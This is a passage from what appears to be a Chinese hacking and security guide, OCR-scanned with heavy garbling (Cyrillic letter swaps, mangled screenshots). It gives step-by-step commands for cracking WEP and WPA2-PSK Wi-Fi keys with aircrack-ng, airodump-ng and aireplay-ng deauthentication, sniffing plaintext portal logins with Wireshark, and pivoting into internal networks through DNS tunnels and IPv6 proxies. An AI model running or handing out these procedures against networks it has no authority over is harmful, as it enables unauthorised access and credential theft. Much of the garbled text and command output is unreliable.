表示 回路 ， 在 Linux 下 的 ping 127.0.0.1 就 是 通过 这 个 虚拟 网 络 设 备 实现 的 ) ‹ ДЕ КӘ 
会 被 标注 为 wlan0， 这 是 正常 模式 。 当 使 用 工具 将 网 卡 载 入 moniter 模 式 时 ， 网 卡 标记 会 变 为 
mon0， 这 是 Linux 下 的 设备 名 ， 所 有 程序 与 便 件 直接 进行 的 交互 操作 都 将 使 用 该 设备 名 作为 
交互 对 象 。 由 于 Linux 较 为 严格 的 权限 管理 ， 程 序 与 硬件 直接 交互 需要 系统 的 最 高 权限 ， 也 
就 是 root 权 限 ， 请 在 root 权 限 下 执行 无 线 渗 透 测 试 套件 (Kali 和 BT 系列 等 专用 的 渗透 测试 系统 
通常 默认 权限 就 是 root) 。 这 里 笔者 推荐 在 Ubuntu 系统 下 搭建 适合 上 自己 的 环境 ， 当 然 读者 还 
可 以 使 用 集成 了 工具 的 BackBox、Kali 等 系统 ， 这 对 于 不 熟悉 Linux 的 新 手 会 很 方便 。 
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5.3.1 概述 


加 密 通 信 最 核心 的 部 分 就 是 算法 ， 这 一 节 主 要 介绍 无 线 安全 中 的 算法 安全 。 不 管 是 
WEP、WPA 还 是 更 多 的 加 密 方 式 ， 都 必须 使 用 加 密 算 法 加 密 ， 一 旦 加 密 算 法 有 漏洞 或 者 
密 钥 被 破解 〈 如 果 是 有 密 钥 的 加 密 算 法 ) ， 一 切 加 密 便 成 了 空谈 。 

目前 整个 互联 网 的 安全 可 以 说 都 是 基于 加 密 算法 的 ， 最 早 的 时 候 只 有 对 等 加 密 算法 
(加 解密 使 用 相同 的 密 钥 ) ， 后 来 出 现 了 不 对 等 加 密 (加 解密 使 用 一 对 密 钥 ， 加 密 用 其 中 
一 个 ， 解 密 只 能 用 男 一 个 ) 以 及 以 MD5 算 法 为 代表 的 不 可 逆 加 密 。 因 为 有 了 不 对 等 加 密 ， 
可 以 在 不 预先 共享 密 钥 的 前 提 下 进行 加 密 通 信 。HTTPS 加 密 的 通信 方式 以 及 OpenSSL 可 以 
说 是 世界 互联 网 安全 的 基石 ， 而 不 可 逆 加 密 算法 〈 摘 要 算法 ) 则 是 网 络 安全 的 重要 保证 。 
MD5 算 法 在 网 站 后 台中 实现 了 在 对 用 户 进行 密码 鉴 权 的 同时 不 保存 用 户 密码 ， 保 证 了 用 户 
信息 的 安全 。 

下 面 将 演示 如 何 进行 无 线 渗透 测试 ， 目 的 是 获取 密 钥 ， 笔 者 将 用 两 个 无 线 网 络 作为 实 
例 ， 一 个 采用 WEP 加 密 ， 一 个 采用 WPA-PSK 加 密 。 

Tips: 如 果 读 者 想 使 用 独立 的 Linux 系 统 来 练习 ， 可 以 尝试 直接 U 盘 启动 BackBox 等 
渗透 测试 系统 ， 如 果 打 算 安 装 独立 的 Linux 系 统 ， 在 分 区 和 安装 系统 的 部 分 一 定 要 非常 小 
心 ，Linux 采 用 了 完全 不 同 的 文件 系统 ， 安 装 的 时 候 若 选择 不 当 很 可 能 会 丢失 数据 。 自 己 
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在 硬盘 上 搭建 渗透 测试 环境 的 话 ， 可 以 直接 安装 Kali/Backbox 或 者 基于 Ubuntu 安装 所 需 的 
工具 。 另 外 虚拟 机 下 的 Linux 不 支持 笔记 本 的 内 置 网 卡 ， 包 括 ExpressCard 网 卡 都 不 支持 ， 
只 能 使 用 USB 网 卡 。 


5.3.2 МЕР 


WEP 协 议 使 用 RC4 加 密 ，RC4 本 来 是 一 种 私有 加 密 算 法 ， 但 是 后 来 被 人 公开 了 ， 运 用 
就 变 得 广泛 起 来 ， 但 是 其 实 很 不 安全 。WEP 的 易 破 解 性 和 ShadowSocks 中 使 用 RC4 加 密 的 
不 安全 性 都 证 明了 这 一 点 。RC4 是 流 加 密 算 法 的 一 种 ， 同 一 个 子 密 钥 绝 不 能 使 用 两 次 ， 
所 以 使 用 (虽然 是 用 明文 传送 的 ) ТУ 的 目的 束 是 要 避免 重复 ; 但 是 24bit (3 个 Byte) 的 
ГУ 实在 太 短 了 ， 在 稍微 老 忙 的 网 络 上 都 极 易 产生 重复 ， 而 且 IV 的 使 用 方式 也 使 其 可 能 i 
受到 关联 式 钥 匙 攻击 。 有 具体 笔者 不 做 细节 分 析 ，RC4 算 法 主要 是 对 数据 进行 了 打 乱 〈 重 
排 ) ， 使 得 数据 混 消 ， 而 没有 加 干扰 ， 这 使 得 RC4 被 普遍 认为 是 一 种 不 安全 的 算法 ， 因 为 
在 数据 中 没有 密 钥 长 度 。 在 WEP 的 破解 过 程 中 只 要 截获 足够 多 的 数据 包 就 可 以 得 到 密 铀 ， 
而 使 用 密 钥 则 可 以 监听 并 解密 所 有 的 数据 包 。 

(1) 打开 终端 。 

(2) 输入 sudo-i1， 然 后 根据 提示 输入 Linux 管 理 员 账户 、 密 码 ， 按 回 车 键 〈( 输 入 密码 
的 时 候 屏 医 上 不 会 显示 密码 或 星 号 ， 但 不 代表 你 密码 没 输 进 去 ) ， 下 一 行 命令 开头 的 $ 变 
为 # 则 代表 成 功 ( 提 示人 符 已 是 # 的 忽略 此 步骤 ) 。 

(3) 输入 apt-get update 更 新 软件 源 。 

(4) 输入 apt-get install aircrack-ng (渗透 测试 系统 忽略 此 步骤 ) 。 

(5) 先 测试 无 线 网 卡 能 不 能 用 ， 使 用 命令 iwconfig， 如 果 出 现 了 某 一 个 网 卡 后 面 有 比 
较 详 细 的 信息 就 请 记 住 它 左边 的 字符 ， 这 里 是 wlan0〈( 见 图 5-1)。 


root@bronco-U31SG: /home/bronco 


root@bronco-U31SG: /home /Бгопсой 
root@bronco-U31SG: /home /bronco# 
root@bronco-U31SG: /home /bronco# 
root@bronco-U31SG: /home /bronco# 
root@bronco-U31SG: /home /Бгопсой 
root@bronco-U31SG: /home /Бгопсой 
root@bronco-U31SG: /home/bronco# iwconfig 
no wireless extensions. 


no wireless extensions. 
no wireless extensions. 


IEEE 802.1169п ESSID: "с103" 

Моде : Мападед Егедуепсу:2.462 GHz Access Point: D 

Bit Вате=45 Mb/s Тх-Ромег=15 dBm 

Retry long limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 

Power Management:off 

Link Quality=46/70 Signal level=-64 dBm 

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 

Tx excessive retries:105 Invalid misc:27317 Missed beacon:0 


root@bronco-U31SG: /home /bronco# А 
5-1 iwconfig 命 令 返 回信 息 
(6) 将 网 卡 设 定 为 监控 模式 ， 输 入 airmon-ng start wlan0 (将 wlan0 耕 换 为 你 使 用 
iwconfig 查 到 的 字段 ，， 如 图 5-2 所 示 。 


11, a 
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root@bronco-U31SG:/home/bronco# а1гтоп-пд start м1апб 


Found 5 processes that could cause trouble. 
If airodump-ng, aireplay-ng ог абгтип-пд stops working after 
a short period of time, you may want to К111 (some of) them! 


Name 
ауаһі-даетоп 
ауаһі-даетоп 
NetworkManager 
wpa_supplicant 
dhclient 
Process with PID 1018 (dhclient) is running on interface wlang 


Interface Chipset Driver 


м1апе Atheros ath9k - [phy0] 
(monitor mode enabled on топб) 


85-2 ”airmon-ng 命 令 正 确 返 回信 息 


(7) 使 用 ifconfig 确认 网 卡 已 进入 监控 模式 ， 在 终端 输入 ifconfig 命 令 ， 


到 mon0 字 样 的 网 络 设备 ， 如 图 5-3 所 示 。 


Link encap: 未 指定 ”硬件 地 址 00-08-СА-9 

UP BROADCAST RUNNING MULTICAST МТИ: 1500 跃 点 数 :1 
接收 数据 包 :6 错误 :6 丢弃 :8 过 载 :6 帧 数 :6 

发 送 数据 包 :6 错误 : о 丢弃 :6 过 载 :6 载波 :6 

ШЕ :о 发 送 队 列 长 度 :1666 

接收 字 节 :1428 (1.4 кв) ”发送 字 节 :6 (0.0 в) 


图 5-3 正确 设置 网 卡 为 监听 模式 后 所 能 看 到 的 信息 


00-00-00-00-00-00- 


将 在 结果 中 看 


(8) 安装 minidwep-g 代 。 常 用 的 渗透 测试 系统 痢 目 市 了 这 个 软件 ， 从 软件 发 布 的 源码 


说 明 来 看 ， 作 者 应 该 是 中 国人 如 图 5-4 所 示 〉。 


х minidwep message 


Wireless Cards Bssid Essid PWR CH Client AP MAC: 54 4А:32 


0230468178 ТРАМК 44 в 85 е WEP Essid: TP-LINK 3% 


wlan0 7 - —— -一 
| м а Р - 9! Нех кеу 0" | 212> 


wiano intei 9100 00:23:CD:65:4C 5A__ TP-LINK_65 6 МЕР _ F 


1С808929 ВАПА __ BMW -72 1 МЕР 0 


ЖҮ 54Е67С304А32 ТРАІНК ЗОО 278 14 МЕР оо РО!) Кеу і5 іп ке етін Еб 
“ еу 


0А:13:236ЕС4 ЗЕ (5 DBVLMIUW 087 ы 1 
Сһаппе! 
| All у 
Encryption 
(WEP v 
Моде sciecied 


И! Ажершу-па -3 Starting агсаск-по to find кеу 


( 0. 2 
Ë Мершу-па -2 8:00-->Starting агсгаск-па to find key 
1:13 
1:13 


в Azeptay-ng -4 >Тгупа to find key пом 

Ё; Ажерву-па -5 9-59-46-.>Alreplay-ng -3 successful injecting now 

С) Arepiay-ng -6 9:59 45-->Агерізу-п0 -5 got fragment xor Ме! injecting now 
Aireplay-ng -7 9-58-51-->Aireplay-ng -2 -p 0841 successfulLiniccting now 


injection rate | 3:58 46-->Starting агерау 


| 500 ы 


В5-4 minidwep-gtk 界 面 


(9) 使 用 minidwep-gtk 破解 WEP 密 码 。 由 于 WEP 的 各 种 协议 漏洞 ， 使 得 破解 WEP 的 
密码 变 得 极为 容易 ， 甚 至 有 这 种 全 目 动 工具 产生 。 破 解 方法 很 简单 ， 单 击 Scan 搜 索 WiFi， 
选择 加 密 方 式 为 WEP 的 热点 ， 然 后 单 击 Lanch 按 钮 (应 该 是 Launch， 开 发 者 打 错 字 了 ) ， 


只 要 信 与 够 好 ， 没 几 分 钟 就 能 在 右边 看 到 密码 了 。 


以 上 是 破解 WEP 密 码 的 方法 。 由 于 破解 过 程 极 为 简单 ，WEP 这 样 的 加 密 方 式 在 当前 


的 安全 环境 中 已 基本 失去 了 价值 。 


А 黑客 与 安全 技术 指南 


5.3.3 М/РА(2)/Р5К 


WPA 和 WPA2 是 现在 主流 的 两 种 加 密 方 法 ， 这 两 种 加 密 方法 其 实 都 具有 很 高 的 安全 
性 ， 它 们 本 身 都 是 企业 级 的 安全 加 密 标 准 ， 需 要 使 用 Radius 服 务 器 来 进行 用 户 鉴 权 。 使 
用 Raidus 服 务 器 做 认证 时 AP 会 目 动 开放 一 条 从 客户 端 到 认证 服务 器 的 通道 ， 因 此 认证 
方法 极为 自由 ， 可 以 是 用 户 名 、 密 码 或 者 是 证 书 ， 还 可 以 是 其 他 方法 。 一 旦 用 户 通过 了 
服务 器 的 鉴 权 ， 服 务 器 返回 同意 连接 的 信息 到 AP 上 ， 至 此 客户 端 就 连接 上 了 一 个 WPA/ 
WPA2 认 证 的 AP。 由 于 Radius 服 务 器 部 署 的 不 便捷 性 和 高 成 本 ， 在 个 人 应 用 中 ， 通常 使 
用 WPA-PSK 或 者 WPA2-PSK 作 为 加 密 方法 ，PSK 的 意思 是 pre-shared key， 即 预 共享 密 
钥 。 简 单 地 说 就 是 在 用 户 访问 之 前 将 访问 密码 告诉 用 户 ， 用 户 得 到 密码 之 后 就 使 用 这 个 
密码 来 连接 热点 。 

WPA2 和 WPA 的 区 别 是 算法 ，WPA 和 WEP 一 样 都 使 用 了 RC4 算 法 ， 但 是 WPA 拓 展 
了 IV 的 位 数 ， 使 得 IV 远 远 没 有 WEP 中 那么 容易 重复 ， 想 等 到 两 个 相同 IV 的 包 变 得 异常 
困难 。 同 时 在 RC4 算 法 的 基础 上 为 每 个 包 引 入 了 单独 的 密 钥 (per-packet кеу) ， 
使 截获 正常 的 通信 数据 包 对 密 钥 的 破解 不 再 有 帮助 。 密 钥 通 过 算法 进行 不 可 道 运算 之 
后 的 数据 只 会 在 握手 包 中 出 现 。 所 以 WPA 的 监听 必须 在 监听 到 握手 包 之 后 才能 获得 有 
可 能 解密 的 数据 包 ， 而 真正 解密 需要 等 到 破解 了 密码 。 解 密 WPA 数 据 包 也 是 一 个 麻烦 的 
过 程 ， 因 为 这 种 运算 的 不 可 道 性 ， 必 须 使 用 密码 字典 中 的 密码 逐个 做 同样 的 运算 ， 尝 试 能 
否 得 到 一 样 的 结果 。 这 样 的 运算 量 较 WEP 无 疑 是 巨大 的 ， 而 且 浮 点 运算 对 于 CPU 是 一 件 非 
常 吃力 的 事 〈( 比 特 币 也 是 浮 点 运算 ) ， 所 以 通常 会 使 用 显卡 或 者 专门 的 FPGA 计 算 卡 来 猜 
测 密码 。 

WPA2 人 允许 使 用 AES 算 法 。AES 是 高 级 加 密 标准 ， 是 一 种 加 密 强 度 和 加 解密 速度 都 高 
于 DES 的 算法 。AES128 在 AES 标 准 中 的 加 密 强 度 最 低 ， 但 是 这 样 的 加 密 强 度 对 破解 时 间 
的 要 求 已 经 远 超人 类 历史 了 ， 所 以 是 很 安全 的 东西 (当然 不 能 排除 存在 算法 漏洞 )。 

现在 WEP 热 点 已 经 非常 少见 了 ， 根 据 需 求 ， 一 般 人 要 么 选择 不 加 密 ， 要 么 选择 WPA 
加 密 ， 而 不 会 选择 WEP 这 种 加 密 强 度 低 、 又 不 同 他 人 开放 网 络 的 方法 。 

WPA(2)-PSK 加 密 的 破解 无 疑 是 非常 困难 的 ， 后 来 由 于 快速 连接 CWPS/QSS) 方法 的 
出 现 ， 可 以 使 破解 变 得 更 加 有 效 ， 但 是 不 能 像 传统 方法 一 样 抓 到 包 后 离开 热点 范围 慢 慢 破 
解 ， 而 需要 将 设备 置 于 热点 周边 几 个 小 时 ， 等 待 破解 完毕 。 

本 书 重点 是 信息 安全 而 不 是 讲解 如 何 足 网 ， 笔 者 认为 WPS/QSS 法 在 实际 的 渗透 过 程 
中 没有 什么 价值 ， 毕 竞 没 有 一 个 可 以 让 你 进行 几 小 时 渗透 的 环境 ， 故 这 里 只 讲解 抓 握手 包 
的 方法 。 

下 面 讲解 WPA(2)-PSK 网 络 的 破解 方法 ， 笔 者 直接 从 网 卡 进 入 了 监视 模式 之 后 开始 
写 ， 前 几 步 和 之 前 所 介绍 的 内 容 是 一 样 的 。 

(1) 使 用 airodump-ng mon0 但 看 当前 的 所 有 无 线 网 络 ， 并 获取 详细 信息 〈 见 图 5-5)。 
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root@bronco-U31SG: /home/bronco 


CH -1 1| Elapsed: 5 mins || 2015-02-27 12:08 
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Beacons #Data, #/s MB ENC CIPHER AUTH ESSID 
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газа 
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54е ИРА? ССМР Р5К 
54е. WPA2 ССМР Р5К 
54е. WPA2 ССМР Р5К 
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54е. ИРА? ССМР Р5К 
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54е. WPA ТКІР PSK 
54е. ОРМ 
54е. ОРМ 
54е. ОРМ 
54е. ОРМ 
54е. ОРМ 
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54е. ИРА ТКІР Р5К 
54e ИРА ССМР Р5К 
54e ИРА ССМР PSK 
54e. WPA TKIP PSK 
54е. WPA2 ССМР PSK 
54e. WPA2 CCMP PSK 
54e. OPN 
54e ИРА? CCMP PSK 
54e. WPA2 CCMP PSK 
22e. WPA2 CCMP PSK 
54e. OPN 
54e. WPA2 CCMP PSK 
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В5-5 airodump-ng m 
атодшар-по УМЕН BF 18] НЕЕ ЖЕ Ж, ЕН НАРНИИ, ЕН 
是 客户 问 的 信息 ， 当 目标 AP 出 现在 了 上 面 一 组 结果 的 时 候 台 可 以 按 Ctrl+C 组 合 键 收 手 了 。 
这 里 第 2 条 c103 就 是 笔者 的 目标 。 
(2) 记录 一 下 目标 AP 的 BSSID (MAC 地 址 ) 和 频段 〈 此 处 为 6) ， 然 后 执行 
airodump-ng -c 频段 --bssid mac 地 址 -w 保存 抓 到 的 数据 包 的 文件 名 mon0， 如 图 5-6 所 示 。 


гоої@Ьгопсо - 03156: /Поте /Бгопсой airodump-ng -c 6 -w miaomiao --bssid D В:В3:Е7 mong 


В5-6 _ airodump-ng 命 令 示 例 
然后 终端 会 进入 如 图 5-7 所 示 的 界面 。 


СН 6 |І Elapsed: 56 $ ][ 2015-02-27 19:35 ][ fixed channel топе: -1 
BSSID PWR ЕХО Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:С7:СО:СВ:ВЗ:Е7 -66 100 331 6556 20 11 54е. WPA2 ССМР PSK с103 


В5510 5ТАТІОМ PWR Rate Lost Packets Probes 


DO:C7 B3:E7 00:08: :CD 9 11е- де 9 3193 
00:С7 83:Е7 СС:ҒА: ‚ВВ -41 5е- 5е 46 3950 


В5-7 ”加 筛选 的 airodump-ng 界 面 


_ Ü А 


Ева КЕЛИН 7158880, РУКИН СЕ нї A2 L НОЈ Р СЕ, ИП 
Жїн ЖЕЛІ БЕЯ ВСН, SEHR Y @% 130 Z Ja Ён] РА ЗЕ E JN Br rH i РЕ, 
了 。 图 $-7 中 第 二 个 客户 端 是 笔者 的 手机 ， 下 面 笔者 将 使 用 重 放 攻 击 ， 并 捕获 它 和 AP 之 间 
的 联系 。 

(3) 开局 一 个 新 终 疹 《获取 root 权 限 ) ， 进 行 重 放 攻击 ， 输 入 aireplay-ng -0 10 -a 
BSSID -c 客户 端 地 址 〈station 列 ) mon0， 如 图 5-8 所 示 。 


oot@bronco-U31SG:/home/bronco# aireplay-ng -0 10 -a DO: -с СС: РА: 
В mono 

19:42:12 Waiting Гог beacon frame (BSSID: D Е7) оп channel -1 

19:42:12 Couldn't determine current channel Гог топе, you should either force t 


e operation with --ignore-negative-one or apply a kernel patch 
Dlease specify an ESSID (-е). 
oot@bronco-U31SG: /home/broncot# В 


Ё 5-8 许多 计算 机 在 使 用 aireplay-ng 时 会 出 现 的 问题 
此 时 出 现 了 一 个 问题 ， 训 是 没有 做 过 特殊 人 处理 的 内 核 可 能 会 导致 mon0 返 回 频 段 为 -1 
(不 存在 的 频段 ) ， 根 据 提示 可 以 使 用 --ignore-negative-one 忽 略 这 个 问题 。 执 行 成 功 后 会 
出 现 如 图 $-9 所 示 的 画面 ， 这 时 可 以 进行 下 一 步 ， 合 则 可 能 是 信号 原因 ， 请 多 重 试 几 次 。 


oot@bronco-U31SG:/home/bronco# aireplay-ng -0 10 -a D0:C7:C0:CB:B3:E7 -c СС:ҒА: 
:BB --1дпоге-педабіуе-опе топе 

Waiting for beacon frame (BSSID: D0:C7:C0:CB:B3:E7) on channel -1 
Sending directed DeAuth. STMAC: -:BB] АСК$ ] 
Sending 64 directed DeAuth. STMAC: -:BB] АСК$ ] 
Sending 64 directed DeAuth. STMAC: -: ВВ; АСК$ ] 
Sending 64 directed DeAuth. 5ТМАС: -:ВВ] АСК$ ] 
Sending 64 directed DeAuth. 5ТМАС: -:BB] АСК$ ] 
Sending 64 directed DeAuth. 5ТМАС: -:BB] АСК$ ] 
Sending 64 directed DeAuth 。 5ТМАС: -: BB] j АСК$ | 
Sending 64 directed DeAuth 。 5ТМАС: -:ВВ] АСК$ ] 
Sending 64 directed DeAuth 。 5ТМАС: -:ВВ] АСК$ ] 
Sending 64 directed DeAuth 。 5ТМАС: -:ВВ] АСК$ ] 

oot@bronco-U315G: /Поте /Бгопсой I 


图 5-9 aireplay-ng 攻 击 成 功 返 回信 息 
(4) 在 alrodump 的 终端 里 按 Ctrlt+C 组 合 键 结束 进程 ， 然 后 用 aircrack-ng 跑 密码 。 常 用 
命令 aircrack-ng -w 字典 文件 -b bssid 地 址 cap 文 件 名 ， 如 图 5-10 所 示 。 


root@bronco-U31SG: /home/bronco# aircrack-ng -w doufugan.txt -b 00:С7: 
miaomiao-01.cap 


图 5-10 aircrack-ng 7 
按 回 车 键 进 入 跑 包 ?界面 ， 如 图 $-11 所 示 。 
Aircrack-ng 1.1 
[00:00:00] 4 keys tested (339.76 К/5) 
KEY FOUND! [ (Ө) ] 


Naster Key ЕЕ F9 69 34 80 F3 31 
А9 59 С1 36 А5 54 21 


Transient Key : ВЕ 1E BF BO C5 00 47 Аб 37 01 DB 38 26 69 5А 
таа В 
20 3 б 
06 9 D 05 


EAPOL НМАС s FA SC BE GB 'F7 ID 8F 94 90 DC 


图 5-11 aircrack-ng 爆 破 密 码 成 功 返 回信 息 
О 跑 包 ， 指 用 字典 与 握手 包 进 行 核对 。 
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此 处 笔者 为 节省 时 间 直 接 把 正确 密码 放 入 字典 了 ， 上 所 以 瞬间 就 跑 出 了 结果 。 
以 上 就 是 破解 WPA(2)-PSK 加 密 的 全 过 程 。 


54 通信 安全 


5.4.1 概述 


无 线 通 信 作 为 一 种 通信 方式 ， 最 核心 的 部 分 日 然 是 信息 本 喘 。 本 节 看 重头 注 信息 在 无 
线 网 络 传递 过 程 中 的 安全 问题 ， 将 使 读者 对 无 线 网 络 环境 中 传输 信息 的 安全 性 以 及 针对 信 
恩 内 容 的 攻防 手段 有 所 了 解 。 


542 加密 网 络 渗透 


通常 情况 下 ， 大 多 数 人 破解 无 线 网 络 可 能 只 是 为 了 “ 足 网 ”， 也 就 是 获得 访问 权限 ， 
但 是 黑客 破解 热 上 的 男 一 重 意 义 是 为 目 己 在 一 个 安全 的 网 络 环 境 中 打开 一 个 突破 口 。 破 解 
无 线 热点 可 以 快速 侵入 防火 墙 内 部 (相对 于 从 外 部 穿 透 NAT) ， 从 而 进入 内 网 渗透 阶段 。 
这 样 的 情景 通常 会 出 现在 社工 渗透 或 者 APT 中 ， 同 时 目的 也 不 仅 是 可 以 上 网 那么 人 简单， 而 
是 销 取 信息 。 此 时 人 们 保卫 的 不 仅仅 是 带宽 和 网 络 资源 ， 更 是 网 络 的 信息 安全 。 


5.4.3 通信 监听 


很 多 企业 会 采用 另外 一 种 无 线 内 网 的 部 署 方式 ， 即 透 传 无 线 网 + 登录 界面 。 比 较 典 型 
的 解决 方案 是 H3C 提 供 的 IMC Portal。 笔 者 工作 的 地 方 也 采用 了 这 套 方 案 来 实现 局 域 网 的 
管理 。 当 用 户 连接 上 该 网 络 后 ， 将 不 能 获得 Internet 及 其 他 同 局 域 网 计算 机 的 访问 权限 ， 
ping 都 ping 不 通 。 帮 黑客 在 社工 渗透 的 过 程 中 使 用 一 台 有 线 网 机 器 〈 通 营 无 须 鉴 权 ) 或 已 
完成 登录 的 无 线 网 机 器 搭 跳板 ， 使 用 Iodine 等 DNS 穿 透 工具 ， 就 可 以 使 用 DNS 通道 穿 透 内 
网 ， 从 而 进入 内 网 渗透 阶段 。DNS 通 道 是 比较 复杂 的 方案 ， 这 里 不 做 过 多 叙述 ， 想 研究 
DNS 通道 技术 的 读者 可 以 目 己 查找 资料 。 另 外 很 可 能 遇 到 的 一 种 情况 是 IPv6 无 屏蔽 ， 而 IPv4 
的 数据 包 却 基本 无 法 穿 透 。 这 时 ， 攻 击 者 会 将 安装 了 目 己 固件 的 开发 板 接 入 有 线 〈 开 发 板 
ЖА Л, БЕВ) ， 搭 建 IPv6 转 IPv4 代 理 服务 器 ， 从 而 实现 未 鉴 权 计算 机 通过 IPV6 穿 
透 到 开发 板 做 的 内 网 跳板 ， 同 时 接 入 内 网 ， 进 入 内 网 渗透 阶段 。 攻 击 者 一 般 先 用 Intel Galileo 
Gen2 作 为 跳板 ， 其 次 是 Beagle Bone 和 树 春 派 。IPv6 代 理 服 务 器 比较 难 配 置 ， 但 是 已 经 有 
成 熟 的 方案 存在 了 。 

攻击 者 对 于 没有 加 密 的 无 线 网 络 ， 一 般 从 无 线 本 喘 入 手 进行 攻击 。 由 于 其 目的 是 穷 取 
数据 ， 可 以 在 不 连接 或 者 无 鉴 权 的 情况 下 实现 ， 甚 全 做 到 获得 鉴 权 所 用 的 账户 〈 由 于 登录 界面 
通常 没有 加 密 ， 合 法 用 户 登 录 时 的 信息 是 明文 传输 的 ) ， 从 而 获得 进入 内 网 的 合法 身份 。 
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黑客 与 安全 技术 指南 


模式 ， 然 后 使 用 Wireshark 进 行 抓 包 即 可 。 

有 几 个 要 点 需要 提示 一 下 : Wireshark 需 要 使 用 root 权 限 局 动 ， 人 否则 无 法 抓 取 监听 模式 
网 卡 的 通信 ， 请 确保 网 卡 被 锁定 在 了 被 监听 的 目标 热点 的 频段 上 ， 如 果 做 不 到 可 以 让 网 卡 
在 连接 目标 热点 的 同时 进行 监听 《可 能 会 打 草 恢 蛇 ) ， 如 果 凰 对 方 发 现 则 可 以 连接 到 相 
同 频段 的 WiFi1， 例 如 是 自己 的 手机 热点 (多 试 几 次 总 会 连 到 相同 频段 的 ) ， 然 后 进行 监 
听 。 这 种 方法 可 以 用 在 不 能 杀 挤 引起 网 卡 调 频 的 进程 时 候 锁定 网 卡 的 频段 。Wireshark 默 认 
只 能 抓 取 一 些 无 法 识别 具体 应 用 层 协 议 的 数据 包 ， 者 要 识别 应 用 层 数 据 包 《例如 在 HITP 
传输 中 具体 包含 的 内 容 ) 则 需要 打开 设置 中 的 一 个 开关 ， 如 图 5-12 所 示 ， 需 要 打开 Enable 
decryption 开 关 。 
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Profile: Default 


Reassernble fragmented 802,11 datagrams: 


ignore мепаог-хресійс HT elements: 


Call subdissoctor for retransmitted 802.11 frames: 


Assume packets have FCS 
Ignore the Protection bit 


Епаше deoypton 


Key examples: 01:02:03:04:05 (40/64-bit WEP), 


攻击 者 依然 可 以 使 用 之 前 的 方法 将 网 卡 进 入 监听 


О м 


Yes - without IV Yes -with [V 


pO Ze 
Р/1.1 СЕТ /4 


01020%Ь0506070609101111213(104/128-0іг WEP). 
МуРаззмога MyAP] (WPA + plaintext password {+ 55110), 
01020304065.. 62061626364 (WPA + 256-bit key}. Invalid keys will Бе ignored. 


бестурлюл Keys 


Ражкете 9807 - Displayed: Bs (0.9%) - Droppet 1 (0.0%) 


Edit... 


index_ipho 


WACO 


Profile: Default 


图 5-12 ”Wireshark 打 开 加 密 支 持 开 关 
之 后 Wireshark 会 要 求 重 局 一 次 监听 ， 按 要 求 重 新 进行 监听 之 后 就 可 以 读 取 应 用 层 数据 
包 了 。 例 如 在 Filter 栏 输入 http 并 单 击 旁 边 的 Apply 便 可 以 只 查看 可 以 轻易 理解 的 HITP 数 据 


包 ， 而 不 显示 其 他 数据 包 ， 具 体 效果 如 图 5-13 所 示 。 
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ERECT TA 
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гезпагк 1.10.6 


Fiter | http 


No 


Time Source 
8852 99.620043000 192.168.43.210 
8856 99.640901000 192.168.43.210 


8859 09.660489000 192.168.43.210 


8863 99.676501000 115,239.210,14 
8868 99.69231300( 115.239,210.14 


#920 99.823785000 192.168.43.210 
8322 99.825576000 115.239.210.14 
9004 100.07839600 115.239.210.14 
9121 100,28597100 115,239,210,14 
9125 100.28598500 115,239,210,14 
9304 100.67805900 115.239.210.14 
9306 100.69654300 115.239.210.14 
9308 100.68655406 115.239.210.14 
9552 101.07787900 113.239.210.14 
9554 101.07991000 115,239,210,14 
9557 101.08373700 115.239.210.14 
9680 101.25731500 221.228.17.152 
9730 101.56922900 192.168.43.210 
9769 101.70387400 192.168.43.210 
9798 101.75657400 192.168.43.210 
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IEEE 802.11 905 Data, Flags: ......F.C 


0000 00 00 12 00 2f 48 0000 24 96 73 2200000000 ../Н.. $-5”.... 


Type/Subtype: QoS Data (0х28) 


(У1.10.6 from тазтег-1.10)] 


x Ç Q < 


Destination 

115.239.210.14 
115.239.210.14 
115.239 210.14 


19г.168.43.210 
192.168.43.210 


221.228 17.152 
192.168 43.210 
192.168.43.210 
192.168.43,210 
192.168.43.210 
192.168.43.210 
192.168.43.210 
192.168 43.210 
192.168.43.210 
192.168.43.210 
192.168.43.210 
192.168.43.210 
221.228.17.152 
221.228 17.152 
221.228.17.152 


0010 10 бс 85 09 с0 00 е0 01 0000 88 02 2с 00 5860 .1...... ....,.Х. 
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ө 


ame (1088 bytes) 


Reassembled ТСР {25985 bytes) 


File: "tmp'iwireshark_pcapng_mon0 


ы 


Expression 


Protocp 


HTTP 
HTTP 
HTTP 


ът; Ен 


Char App ча 

Length Info 

707 GET /stati mews/webapp/modubes/gmu 2283505 HTTP/1.1 
708 СЕТ /static/news/webappimodules/rnain_c64ff7a.js HTTP/1.1 
707 GET !static/nows/wobappimopdulos/ib_1e85b55.jç HTTP/1.1 


B75 Continuation or non-HTTP traffk 
1464 Continuation or non-HTTP traffk 


550 GET toolbar//show. do?mxi=0. 7296242050360888 НТТР/1.1 
215 Continuation or non-HTTP traffic 
1464 Continuation ог non-HTTP traffk 
1464 Continuation ог поп-НТТР traffk 
314 Continuation ог non-HTTP traffk 
1454 Continuation or non-HTTP traffk 
1464 Continuation ог mon-HTTP гаї 
314 Continustion ог non-HTTP traffic 
164 НТТРЛ.1 200 ОК (apphcation/x-Javascript) 
1464 Continuation ог поп-НТТР traffk 
748 Continuation ог non-HTTP traffk 
1088 НТТР/1.1 200 ОЖ (exUjavascipg) 
436 СЕТ /toolbar/images/traffikalerutogo_4g.png HTTP/1.1 
435 СЕТ /taolbarfimages/trafficalert/q_2000 png НТТР/1.1 
440 GET /toolbarimages/traffkalort/btn-fowadd.png НТТР/1.1 


Uncompressed ватку body (155320 bytes] 


Packets: 9907 - Displayed: 84 (0.9%) - Dropped: 1 {0.0%} 


图 5-13 ”Wireshark 的 http 筛 选 器 效果 
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同样 ， 这 个 方法 还 可 以 应 用 于 加 密 的 WiFi， 当 然 前 提 是 知道 密码 。 对 加 密 WiFi 通 信和 的 
数据 包 进 行 解 密 的 方法 也 很 简单 。 单 击 Decryption Keys 后 面 的 Edit 按 钮 ， 然 后 按照 第 一 层 
设置 界面 上 的 格式 要 求 添加 自己 所 需要 的 key， 即 可 将 加 密 的 WiFi 通 信 进 行 截取 ， 操 作 如 
图 5-14 所 示 。 
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1514 Wireshark 添 加 目标 WiFi 密 钥 
这 种 被 动 监听 的 方案 在 做 了 ARP 隔 离 的 网 络 中 ， 或 者 在 想 彻底 隐蔽 上 自己 不 被 目标 的 网 
络 管理 员 发 现 的 情况 下 是 非常 有 效 的 攻击 方法 。 


544 已 保存 热点 钓鱼 


